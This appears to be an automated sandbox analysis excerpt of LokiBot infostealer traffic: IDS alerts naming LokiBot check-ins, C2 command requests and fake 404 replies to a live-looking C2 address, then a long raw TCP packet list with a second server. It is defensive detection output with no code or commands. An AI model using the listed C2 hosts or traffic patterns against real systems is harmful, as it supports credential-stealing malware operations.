2024-11-15T18:15:51.299265+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50026	94.156.177.95	80	TCP
2024-11-15T18:15:51.299265+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50026	94.156.177.95	80	TCP
2024-11-15T18:15:51.299652+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50026	TCP
2024-11-15T18:15:51.452174+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:51.452174+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:51.452174+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:52.389939+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:52.389939+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:52.395416+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50030	TCP
2024-11-15T18:15:52.550655+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:52.550655+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:52.550655+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:53.531119+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:53.531119+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:53.536574+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50039	TCP
2024-11-15T18:15:53.681411+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:53.681411+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:53.681411+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:54.620846+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:54.620846+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:54.626383+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50044	TCP
2024-11-15T18:15:54.778594+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:54.778594+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:54.778594+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:55.779442+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:55.779442+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:55.785103+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50049	TCP
2024-11-15T18:15:55.941777+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:55.941777+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:55.941777+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:56.869263+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:56.869263+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:56.875613+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50054	TCP
2024-11-15T18:15:57.034588+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:57.034588+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:57.034588+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:58.000787+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:58.000787+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:58.012601+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50063	TCP
2024-11-15T18:15:58.148280+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:15:58.148280+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:15:58.148280+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:15:59.147535+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:15:59.147535+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:15:59.152769+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50068	TCP
2024-11-15T18:15:59.321996+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:15:59.321996+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:15:59.321996+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:16:00.270107+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:16:00.270107+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:16:00.275401+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50073	TCP
2024-11-15T18:16:00.432593+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:00.432593+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:00.432593+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:01.383166+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:01.383166+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:01.388476+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50080	TCP
2024-11-15T18:16:01.549900+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50084	94.156.177.95	80	TCP
2024-11-15T18:16:01.549900+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50084	94.156.177.95	80	TCP
2024-11-15T18:16:01.549900+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50084	94.156.177.95	80	TCP
2024-11-15T18:16:02.497178+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50084	94.156.177.95	80	TCP
2024-11-15T18:16:02.497178+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50084	94.156.177.95	80	TCP
2024-11-15T18:16:02.503491+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50084	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 18:14:05.628921986 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:05.633915901 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:05.634198904 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:05.634198904 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:05.639383078 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.301994085 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.302083015 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.302119017 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.302144051 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.302161932 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.302278042 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.302314997 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.302364111 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.302372932 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.302418947 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.302468061 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.302470922 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.302495003 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.302521944 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.302526951 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.302803040 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.302995920 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.303050995 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.303059101 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.303340912 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.307126045 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.307337046 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.307348967 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.307395935 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.307495117 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.307495117 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.433305979 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.433407068 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.433459044 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.433480024 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.433509111 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.433521986 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.433563948 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.433612108 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.433700085 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.433744907 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.433748960 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.433790922 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.433804989 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.433857918 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.434217930 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.434268951 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.434279919 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.434309006 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.434552908 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.434602976 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.434612036 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.434645891 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.434653044 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.434700012 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.435055971 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.435110092 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.435122967 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.435169935 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.435394049 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.435441971 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.435446978 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.435488939 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.435492039 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.435538054 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.435852051 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.435900927 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.435919046 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.435942888 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.436203003 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.436250925 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.436258078 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.436294079 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.436316967 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.436364889 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.438441992 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.441092014 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.550894022 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.550980091 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.551007032 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.551032066 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.551068068 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.551083088 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.551116943 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.551134109 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.551173925 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.551388025 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.551474094 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.551491976 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.551521063 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.551536083 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.551547050 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.551547050 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.551575899 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.552210093 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.552263975 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.552273989 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.552314997 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.552439928 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.552454948 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.552484035 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.552485943 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.552510977 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.552526951 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.552902937 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.552926064 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.552944899 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.552962065 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.552974939 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.552992105 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.552999973 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.553023100 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.553049088 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.553693056 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.553709984 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.553731918 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.553735018 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.553756952 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.553761959 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.553771973 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.553782940 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.553798914 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.553821087 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.554500103 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.554522991 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.554547071 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.554548025 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.554568052 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.554585934 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.554991007 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.555011988 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.555037022 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.555037022 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.555054903 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.555059910 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.555078983 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.555083990 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.555094004 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.555133104 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.555808067 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.555830002 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.555854082 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.555857897 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.555876017 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.555891991 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.556330919 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.556350946 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.556375027 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.556376934 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.556399107 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.556399107 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.556421041 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.556421995 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.556430101 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.556468964 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.557270050 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.557291985 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.557315111 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.557318926 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.557334900 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.557338953 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.557352066 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.557358980 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.557377100 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.557384968 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.557394981 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.557420015 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.557926893 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.557948112 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.557971954 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.557972908 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.557991028 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.558012009 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.669008970 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669071913 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669091940 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669168949 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.669249058 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669275045 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.669286966 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669295073 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.669310093 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669333935 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669347048 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.669347048 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.669852018 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669881105 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669902086 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669913054 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.669928074 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669948101 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669950962 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.669972897 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.669976950 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.670001984 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.670010090 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.670614958 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.670635939 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.670661926 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.670665979 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.670686007 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.670722008 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.670722008 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.670738935 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.671130896 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.671154976 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.671179056 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.671180010 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.671194077 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.671205997 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.671217918 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.671224117 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.671243906 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.671252966 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.671264887 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.671277046 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.671993971 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672017097 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672039986 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672043085 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672064066 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672068119 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672086954 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672089100 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672102928 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672116995 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672123909 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672147036 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672172070 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672696114 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672713041 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672743082 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672751904 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672763109 CET	80	49730	192.3.243.136	192.168.2.4
